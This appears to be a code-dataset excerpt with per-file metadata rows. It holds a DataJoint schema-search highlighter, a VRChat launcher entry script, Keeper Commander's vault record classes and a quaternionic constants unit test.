        raw regex Match objects alongside a colorized 'pretty_definition'."""
        # regex constants
        s = r'[\t ]*'        # horizontal whitespace
        w = r'\w*'           # words valid for variable names
        e = r'[\w()."\'=]*'  # valid python expression
        n = '\n\r\v\f'       # vertical whitespace
        a = fr'[^{n}]*'      # all characters except vertical whitespace
        # determine appropriate regex based on level
        if level is None:  # anywhere
            level_regex = self.search_str
        elif level == 'table':
            level_regex = fr'(?<=[{n}]){s}class{s}{w}{self.search_str}{w}{e}:{s}(?=[#{n}])'
        elif level == 'attribute':
            level_regex = (f'(?<=[{n}]){s}(->{s}{e}{self.search_str}|'
                           f'{w}{self.search_str}{w}{s}(={s}{e}{s})?:){a}(?=[#{n}])')
        elif level == 'comment':
            level_regex = f'#{a}{self.search_str}{a}(?=[{n}])'
        # split full definition into class blocks + iterate over those that match regex once
        for match_definition in [b[2:] if i == 2 else b
                                 for i, b in enumerate(self._definition_string.split('\n\n\n'))
                                 if (i > 1 and 'dj.Schema' not in b and
                                     next(re.finditer(level_regex, b, re.I), False))]:
            schema_name, table_name, table_tier = re.compile(
                fr'@(?P<schema_name>{w}){s}[{n}]'
                fr'{s}class{s}(?P<table_name>{w}){s}\((?P<table_tier>{e})\):{s}(?=[#{n}])'
            ).match(match_definition).groups()
            self.matches[f'{schema_name}.{table_name}'] = {
                'definition': match_definition, 'pretty_definition': match_definition,
                'schema_name': schema_name, 'table': table_name, 'tier': table_tier,
                'matches': [],
            }
            color_shift = 9  # shift for red color
            # iterate over matches within class block to store match and adjust color
            for i, match in enumerate([m for m in re.finditer(level_regex,
                                                              match_definition,
                                                              re.I)]):
                self.matches[f'{schema_name}.{table_name}']['matches'].append(match)
                L, R = match.span()
                # print(f'debug: {repr(match_definition[L+i*color_shift:R+i*color_shift])}')
                L, R = tuple(map(sum, zip((L, L), next(re.finditer(
                    self.search_str,
                    self.matches[f'{schema_name}.{table_name}']['pretty_definition'][
                        L+i*color_shift:R+i*color_shift],
                    re.I)).span())))
                self.matches[f'{schema_name}.{table_name}']['pretty_definition'] = (
                    self.matches[f'{schema_name}.{table_name}']['pretty_definition'][
                        :L+i*color_shift] +
                    colored(self.matches[f'{schema_name}.{table_name}']['pretty_definition'][
                        L+i*color_shift:R+i*color_shift], 'red') +
                    self.matches[f'{schema_name}.{table_name}']['pretty_definition'][
                        R+i*color_shift:])
    def print(self):
        """Print all matched (highlighted) definitions, or a no-match notice."""
        if not self.matches:
            print('No match found!')
        else:
            # _do_search results lack 'pretty_definition'; fall back to 'definition'.
            try:
                matched_str = '\n-------------------------------------\n'.join(
                    [m['pretty_definition'] for m in self.matches.values()])
            except KeyError:
                matched_str = '\n-------------------------------------\n'.join(
                    [m['definition'] for m in self.matches.values()])
            print(matched_str)
| 50.339056
| 103
| 0.499446
| 11,645
| 0.992838
| 0
| 0
| 0
| 0
| 0
| 0
| 2,879
| 0.24546
|
36b29aea512c076457ac717e34101b418e8451d8
| 1,838
|
py
|
Python
|
acvrct.py
|
lyzcoote/VRChat-Py-Launcher
|
307fc26d2a464ba97e93293f757e7fdaa29098de
|
[
"MIT"
] | null | null | null |
acvrct.py
|
lyzcoote/VRChat-Py-Launcher
|
307fc26d2a464ba97e93293f757e7fdaa29098de
|
[
"MIT"
] | null | null | null |
acvrct.py
|
lyzcoote/VRChat-Py-Launcher
|
307fc26d2a464ba97e93293f757e7fdaa29098de
|
[
"MIT"
] | null | null | null |
################################################################################
# #
# Modules #
# #
################################################################################
import otherUtils as otherUtils
import sys
import os
################################################################################
# #
# Functions #
# #
################################################################################
def override_where():
    """Stand-in for certifi.core.where: resolve the bundled cacert.pem path."""
    bundle_name = "cacert.pem"
    return os.path.abspath(bundle_name)
if hasattr(sys, "frozen"):
    # Running as a frozen (e.g. PyInstaller) executable: certifi's CA bundle
    # is not where requests expects it, so point every lookup at the
    # cacert.pem shipped next to the executable.
    import certifi.core
    os.environ["REQUESTS_CA_BUNDLE"] = override_where()
    certifi.core.where = override_where
    # Patch requests' cached bundle paths as well (they capture the value
    # at import time).
    import requests.utils
    import requests.adapters
    requests.utils.DEFAULT_CA_BUNDLE_PATH = override_where()
    requests.adapters.DEFAULT_CA_BUNDLE_PATH = override_where()
################################################################################
#                                                                              #
#                                   Main App                                   #
#                                                                              #
################################################################################
if __name__ == "__main__":
    # Hide tracebacks from end users; errors surface as a single message.
    sys.tracebacklimit = 0
    otherUtils.launcherMenu()
| 40.844444
| 80
| 0.259521
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,325
| 0.720892
|
36b2e2e2a3deb4780a06fa5d022548e328c4c7a6
| 16,002
|
py
|
Python
|
keepercommander/vault.py
|
Keeper-Security/commander
|
93fee5d2ba56f2288e00ab33003597d00a302b5c
|
[
"MIT"
] | null | null | null |
keepercommander/vault.py
|
Keeper-Security/commander
|
93fee5d2ba56f2288e00ab33003597d00a302b5c
|
[
"MIT"
] | null | null | null |
keepercommander/vault.py
|
Keeper-Security/commander
|
93fee5d2ba56f2288e00ab33003597d00a302b5c
|
[
"MIT"
] | null | null | null |
# _ __
# | |/ /___ ___ _ __ ___ _ _ ®
# | ' </ -_) -_) '_ \/ -_) '_|
# |_|\_\___\___| .__/\___|_|
# |_|
#
# Keeper Commander
# Contact: ops@keepersecurity.com
#
import abc
import datetime
import json
from typing import Optional, List, Tuple, Iterable, Type, Union, Dict, Any
import itertools
from .params import KeeperParams
from . import record_types
class KeeperRecord(abc.ABC):
    """Abstract base for all Keeper vault record versions (v2/v3/v4/v5).

    Subclasses implement get_version/get_record_type/load_record_data; the
    static factories create() and load() pick the concrete subclass.
    """
    def __init__(self):
        self.record_uid = ''            # vault record UID
        self.title = ''                 # record title
        self.client_time_modified = 0   # client-side modification timestamp
        self.record_key = b''           # decrypted record key
        self.revision = 0               # server revision counter
    @abc.abstractmethod
    def get_version(self):  # type: () -> int
        pass
    @property
    def version(self):
        return self.get_version()
    @abc.abstractmethod
    def get_record_type(self):  # type: () -> str
        pass
    @property
    def record_type(self):
        return self.get_record_type()
    @abc.abstractmethod
    def load_record_data(self, data, extra=None):  # type: (dict, Optional[dict]) -> None
        pass
    @staticmethod
    def create(params, record_type):  # type: (KeeperParams, str) -> Optional['KeeperRecord']
        """Create an empty record of the given type name.

        'legacy'/'general' map to PasswordRecord, 'file' to FileRecord;
        anything else becomes a TypedRecord pre-populated with the fields
        declared in params.record_type_cache (when the type is known).
        """
        if not record_type:
            record_type = 'login'
        if record_type in {'legacy', 'general'}:
            record = PasswordRecord()
        elif record_type == 'file':
            record = FileRecord()
        else:
            record = TypedRecord()
            meta_data = next((x for x in params.record_type_cache.values()
                              if x.get('$id', '') == record_type.lower()), None)
            if meta_data and 'fields' in meta_data:
                for field in meta_data['fields']:
                    typed_field = TypedField()
                    typed_field.type = field.get('$ref', 'text')
                    typed_field.label = field.get('label', None)
                    record.fields.append(typed_field)
        return record
    @staticmethod
    def load(params, rec):
        # type: (KeeperParams, Union[str, Dict[str, Any]]) -> Optional['KeeperRecord']
        """Instantiate a KeeperRecord from a cached record (by UID or dict).

        Returns None when the record is missing, still encrypted, or has an
        unsupported version.
        """
        if isinstance(rec, str):
            if rec not in params.record_cache:
                return
            record = params.record_cache[rec]
        elif isinstance(rec, dict):
            record = rec
        else:
            return
        # Only records that were already decrypted can be loaded.
        if 'data_unencrypted' not in record:
            return
        version = record.get('version', 0)
        if version == 2:
            keeper_record = PasswordRecord()
        elif version == 3:
            keeper_record = TypedRecord()
        elif version == 4:
            keeper_record = FileRecord()
            keeper_record.storage_size = record.get('file_size')
        elif version == 5:
            keeper_record = ApplicationRecord()
        else:
            return
        keeper_record.record_uid = record['record_uid']
        keeper_record.revision = record.get('revision', 0)
        keeper_record.record_key = record['record_key_unencrypted']
        keeper_record.client_time_modified = record.get('client_modified_time', 0)
        data = json.loads(record['data_unencrypted'])
        extra = json.loads(record['extra_unencrypted']) if 'extra_unencrypted' in record else None
        keeper_record.load_record_data(data, extra)
        return keeper_record
    def enumerate_fields(self):  # type: () -> Iterable[Tuple[str, Union[None, str, List[str]]]]
        """Yield (field-name, value) pairs; subclasses extend this."""
        yield '(title)', self.title
    @staticmethod
    def size_to_str(size):  # type: (Union[int, float]) -> str
        """Render a byte count with a human-readable unit suffix.
        NOTE(review): thresholds use 1000 while the divisor is 1024."""
        scale = 'Bytes'
        if size > 0:
            if size > 1000:
                size = size / 1024
                scale = 'Kb'
            if size > 1000:
                size = size / 1024
                scale = 'Mb'
            if size > 1000:
                size = size / 1024
                scale = 'Gb'
        return f'{size:.2f}'.rstrip('0').rstrip('.') + f' {scale}'
class CustomField(object):
    """Legacy (v2) record custom field: a name/value pair with a type tag."""

    def __init__(self, custom_field=None):  # type: (Optional[dict]) -> None
        source = {} if custom_field is None else custom_field
        self.name = source.get('name', '')
        self.value = source.get('value', '')
        self.type = source.get('type', '')
class AttachmentFileThumb:
    """Thumbnail descriptor for a legacy attachment file."""

    def __init__(self, thumb_field=None):  # type: (Optional[dict]) -> None
        if thumb_field:
            self.id = thumb_field.get('id', '')
            self.type = thumb_field.get('type', '')
            self.size = thumb_field.get('size', 0)
        else:
            # None or empty dict: fall back to neutral defaults.
            self.id = ''
            self.type = ''
            self.size = 0
class AttachmentFile(object):
    """Legacy (v2) record attachment metadata stored in the record 'extra'."""

    def __init__(self, file_field=None):  # type: (Optional[dict]) -> None
        # Bug fix: the declared default of None used to crash on the
        # unguarded .get() calls below; normalise to an empty dict like the
        # sibling field classes (CustomField, ExtraField) do.
        if file_field is None:
            file_field = {}
        self.id = file_field.get('id', '')
        self.key = file_field.get('key', '')
        self.name = file_field.get('name', '')
        self.title = file_field.get('title', '')
        self.mime_type = file_field.get('type', '')
        self.size = file_field.get('size', 0)
        self.last_modified = file_field.get('lastModified', 0)  # type: int
        self.thumbnails = []  # type: List[AttachmentFileThumb]
        thumbs = file_field.get('thumbnails')
        if isinstance(thumbs, list):
            for thumb in thumbs:
                self.thumbnails.append(AttachmentFileThumb(thumb))
class ExtraField(object):
    """Legacy (v2) 'extra' field entry (e.g. the TOTP seed)."""

    def __init__(self, extra_field=None):  # type: (Optional[dict]) -> None
        source = extra_field if extra_field is not None else {}
        self.id = source.get('id', '')
        self.field_type = source.get('field_type', '')
        self.field_title = source.get('field_title', '')
        self.data = source.get('data', '')
class PasswordRecord(KeeperRecord):
    """Legacy (version 2) login record: login/password/url/notes plus custom
    fields, optional attachments and a TOTP seed from the 'extra' blob."""
    def __init__(self):
        super(PasswordRecord, self).__init__()
        self.login = ''
        self.password = ''
        self.link = ''
        self.notes = ''
        self.custom = []    # type: List[CustomField]
        self.attachments = None     # type: Optional[List[AttachmentFile]]
        self.totp = ''      # type: str
    def get_version(self):  # type: () -> int
        return 2
    def get_record_type(self):
        # Legacy records carry no record type.
        return ''
    def load_record_data(self, data, extra=None):
        """Populate fields from the decrypted 'data' (and optional 'extra') JSON."""
        self.title = data.get('title', '')
        self.login = data.get('secret1', '')
        self.password = data.get('secret2', '')
        self.link = data.get('link', '')
        self.notes = data.get('notes', '')
        custom = data.get('custom')
        if isinstance(custom, list):
            # Only well-formed custom entries (dicts with a name) are kept.
            self.custom.extend((CustomField(x) for x in custom if isinstance(x, dict) and 'name' in x))
        if isinstance(extra, dict):
            if 'files' in extra:
                self.attachments = [AttachmentFile(x) for x in extra['files']]
            if 'fields' in extra and isinstance(extra['fields'], list):
                # First 'totp' extra field wins; empty string when absent.
                self.totp = next((x.get('data', '') for x in extra['fields'] if x.get('field_type') == 'totp'), '')
    def enumerate_fields(self):
        # type: () -> Iterable[Tuple[str, Union[None, str, List[str]]]]
        """Yield (name, value) pairs: base fields, logins, custom, attachments."""
        for pair in super(PasswordRecord, self).enumerate_fields():
            yield pair
        yield '(login)', self.login
        yield '(password)', self.password
        yield '(url)', self.link
        yield '(notes)', self.notes
        if self.totp:
            yield '(oneTimeCode)', self.totp
        for cf in self.custom:
            yield cf.name, cf.value
        if self.attachments:
            for atta in self.attachments:
                yield atta.title or atta.name, f'File ID: {atta.id}; Size: {KeeperRecord.size_to_str(atta.size)}'
class TypedField(object):
    """One field of a typed (v3) record: a field type, an optional label and a
    list of values."""

    def __init__(self, typed_field=None):
        if typed_field is None:
            typed_field = {}
        self.type = typed_field.get('type', '')
        self.label = typed_field.get('label', '')
        self.value = typed_field.get('value', [])

    def get_default_value(self, value_type=None):  # type: (Optional[Type]) -> any
        """Return the first stored value (values are normally kept in a list).

        When ``value_type`` is a type, return None unless the value is an
        instance of it.
        """
        value = None
        if isinstance(self.value, list):
            if len(self.value) > 0:
                value = self.value[0]
        else:
            value = self.value
        if isinstance(value_type, type):
            if not isinstance(value, value_type):
                return
        return value

    def get_field_name(self):
        """Render the display name: '(type).label', '(type)' or plain 'label'."""
        return f'({self.type}).{self.label}' if self.type and self.label else \
            f'({self.type})' if self.type else \
            f'{self.label}'

    @staticmethod
    def get_exported_value(field_type, field_value):
        # type: (str, Any) -> Iterable[str]
        """Yield human-readable string(s) for a raw field value.

        Structured values (host, phone, name, address, securityQuestion,
        paymentCard, bankAccount, privateKey) are flattened to one line each;
        list values are expanded element by element.
        """
        if not field_value:
            return
        if isinstance(field_value, str):
            yield field_value
            return
        rf = record_types.RecordFields.get(field_type)
        ft = record_types.FieldTypes.get(rf.type) if rf else None
        if isinstance(field_value, int):
            # Bug fix: guard ft — unknown field types used to crash here.
            if ft is not None and ft.name == 'date':
                if field_value != 0:
                    # Stored as milliseconds since the epoch.
                    dt = datetime.datetime.fromtimestamp(int(field_value // 1000)).date()
                    yield str(dt)
            else:
                yield str(field_value)
        elif isinstance(field_value, list):
            for elem in field_value:
                for ev in TypedField.get_exported_value(field_type, elem):
                    yield ev
        elif isinstance(field_value, dict):
            if ft is None:
                # Unknown field type: no way to render a structured value.
                return
            if ft.name == 'host':
                hostname = field_value.get('hostname') or ''
                port = field_value.get('port') or ''
                if hostname or port:
                    if port:
                        hostname = f'{hostname}:{port}'
                    yield hostname
            elif ft.name == 'phone':
                phone = field_value.get('type') or ''
                if phone:
                    phone += ':'
                for key in ('region', 'number', 'ext'):
                    if key in field_value:
                        value = field_value[key]
                        if value:
                            phone += f' {value}'
                yield phone
            elif ft.name == 'name':
                last = field_value.get('last') or ''
                first = field_value.get('first') or ''
                middle = field_value.get('middle') or ''
                if last or first or middle:
                    name = f'{last},'
                    if first:
                        name += f' {first}'
                    if middle:
                        name += f' {middle}'
                    yield name
            elif ft.name == 'address':
                # Bug fix: 'street2' was never read ('street1' was queried twice).
                street = ' '.join(x for x in (field_value.get('street1'), field_value.get('street2')) if x)
                city = field_value.get('city') or ''
                state = ' '.join(x for x in (field_value.get('state'), field_value.get('zip')) if x)
                country = field_value.get('country') or ''
                if street or city or state or country:
                    address = ', '.join((street, city, state, country))
                    while address.endswith(', '):
                        address = address.rstrip(', ')
                    yield address
            elif ft.name == 'securityQuestion':
                q = (field_value.get('question') or '').rstrip('?')
                a = field_value.get('answer') or ''
                if q or a:
                    yield f'{q}? {a}'
            elif ft.name == 'paymentCard':
                number = field_value.get('cardNumber') or ''
                expiration = field_value.get('cardExpirationDate') or ''
                cvv = field_value.get('cardSecurityCode') or ''
                if number or expiration or cvv:
                    if expiration:
                        number += f' EXP:{expiration}'
                    if cvv:
                        number += f' {cvv}'
                    # Bug fix: previously yielded only the CVV instead of the
                    # composed card string.
                    yield number
            elif ft.name == 'bankAccount':
                account = field_value.get('accountType') or ''
                if account:
                    account += ':'
                for key in ('routingNumber', 'accountNumber'):
                    if key in field_value:
                        value = field_value[key]
                        if value:
                            account += f' {value}'
                if account:
                    yield account
            elif ft.name == 'privateKey':
                private_key = field_value.get('privateKey') or ''
                if private_key:
                    yield private_key

    def get_external_value(self):  # type: () -> Iterable[str]
        """Yield the exported string form(s) of this field's own value."""
        for value in self.get_exported_value(self.type, self.value):
            yield value
class TypedRecord(KeeperRecord):
    """Typed (version 3) record: a record type name plus standard and custom
    TypedField lists."""
    def __init__(self):
        super(TypedRecord, self).__init__()
        self.type_name = ''
        self.notes = ''
        self.fields = []    # type: List[TypedField]
        self.custom = []    # type: List[TypedField]
    def get_version(self):  # type: () -> int
        return 3
    def get_record_type(self):
        return self.type_name
    def get_typed_field(self, field_type, label=None):  # type: (str, Optional[str]) -> Optional[TypedField]
        """Find the first field (standard, then custom) matching the type and,
        when given, the label (case-insensitive); None when absent."""
        return next((x for x in itertools.chain(self.fields, self.custom)
                     if field_type == x.type and (not label or (x.label and label.casefold() == x.label.casefold()))),
                    None)
    def load_record_data(self, data, extra=None):
        """Populate from the decrypted record 'data' JSON ('extra' is unused here)."""
        self.type_name = data.get('type', '')
        self.title = data.get('title', '')
        self.notes = data.get('notes', '')
        self.fields.extend((TypedField(x) for x in data.get('fields', [])))
        self.custom.extend((TypedField(x) for x in data.get('custom', [])))
    def enumerate_fields(self):
        # type: () -> Iterable[Tuple[str, Union[None, str, List[str]]]]
        """Yield (name, value) pairs; multi-valued fields yield a list."""
        for pair in super(TypedRecord, self).enumerate_fields():
            yield pair
        yield '(type)', self.record_type
        yield '(notes)', self.notes
        for field in itertools.chain(self.fields, self.custom):
            values = list(field.get_external_value())
            # Scalar for one value, '' for none, list for several.
            yield field.get_field_name(), '' if len(values) == 0 else values[0] if len(values) == 1 else values
class FileRecord(KeeperRecord):
    """File (version 4) record: metadata for an uploaded attachment file."""
    def __init__(self):
        super(FileRecord, self).__init__()
        self.name = ''
        self.size = None    # type: Optional[int]
        self.mime_type = ''
        self.last_modified = None   # type: Optional[int]
        # Server-side storage size; set by KeeperRecord.load from 'file_size'.
        self.storage_size = None    # type: Optional[int]
    def get_version(self):  # type: () -> int
        return 4
    def get_record_type(self):
        return 'file'
    def load_record_data(self, data, extra=None):
        """Populate from the decrypted record 'data' JSON ('extra' is unused)."""
        self.title = data.get('title', '')
        self.name = data.get('name', '')
        self.size = data.get('size')
        self.mime_type = data.get('type', '')
        self.last_modified = data.get('lastModified')
    def enumerate_fields(self):  # type: () -> Iterable[Tuple[str, Union[None, str, List[str]]]]
        """Yield (name, value) pairs including a human-readable size."""
        for pair in super(FileRecord, self).enumerate_fields():
            yield pair
        yield '(type)', self.get_record_type()
        yield '(name)', self.name
        if self.mime_type:
            yield '(mime-type)', self.mime_type
        yield '(size)', KeeperRecord.size_to_str(self.size)
class ApplicationRecord(KeeperRecord):
    """Secrets-Manager application record (stored as record version 5)."""

    def __init__(self):
        super(ApplicationRecord, self).__init__()

    def get_version(self):
        return 5

    def get_record_type(self):
        return 'app'

    def load_record_data(self, data, extra=None):
        """Populate from decrypted record data; only the title is stored."""
        self.title = data.get('title', '')

    def enumerate_fields(self):  # type: () -> Iterable[Tuple[str, Union[None, str, List[str]]]]
        """Yield the base-class pairs followed by the record type."""
        yield from super(ApplicationRecord, self).enumerate_fields()
        yield '(type)', self.get_record_type()
| 37.213953
| 118
| 0.541057
| 15,601
| 0.97488
| 6,098
| 0.381054
| 7,192
| 0.449416
| 0
| 0
| 2,764
| 0.172718
|
36b37042d59ea92a31e186729793c7340e94c845
| 773
|
py
|
Python
|
tests/test_quaternionic.py
|
mhostetter/quaternionic
|
159ba7caa41afe33172373ebe4119209577812c1
|
[
"MIT"
] | 40
|
2020-08-11T22:13:49.000Z
|
2022-03-25T08:10:19.000Z
|
tests/test_quaternionic.py
|
mhostetter/quaternionic
|
159ba7caa41afe33172373ebe4119209577812c1
|
[
"MIT"
] | 28
|
2020-08-27T17:09:34.000Z
|
2022-03-27T19:56:57.000Z
|
tests/test_quaternionic.py
|
mhostetter/quaternionic
|
159ba7caa41afe33172373ebe4119209577812c1
|
[
"MIT"
] | 6
|
2020-09-05T13:12:51.000Z
|
2022-03-10T02:59:05.000Z
|
import warnings
import numpy as np
import quaternionic
import pytest
def test_constants():
    """Check the module-level unit quaternions: presence, immutability, values."""
    for const in ['one', 'x', 'y', 'z', 'i', 'j', 'k']:
        assert hasattr(quaternionic, const)
        c = getattr(quaternionic, const)
        # The constants are read-only: in-place modification must raise.
        with pytest.raises(ValueError):
            c *= 1.2
    # x/i, y/j, z/k are aliases for the same basis quaternions.
    assert np.equal(quaternionic.one, quaternionic.array(1, 0, 0, 0))
    assert np.equal(quaternionic.x, quaternionic.array(0, 1, 0, 0))
    assert np.equal(quaternionic.i, quaternionic.array(0, 1, 0, 0))
    assert np.equal(quaternionic.y, quaternionic.array(0, 0, 1, 0))
    assert np.equal(quaternionic.j, quaternionic.array(0, 0, 1, 0))
    assert np.equal(quaternionic.z, quaternionic.array(0, 0, 0, 1))
    assert np.equal(quaternionic.k, quaternionic.array(0, 0, 0, 1))
| 38.65
| 69
| 0.659767
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 23
| 0.029754
|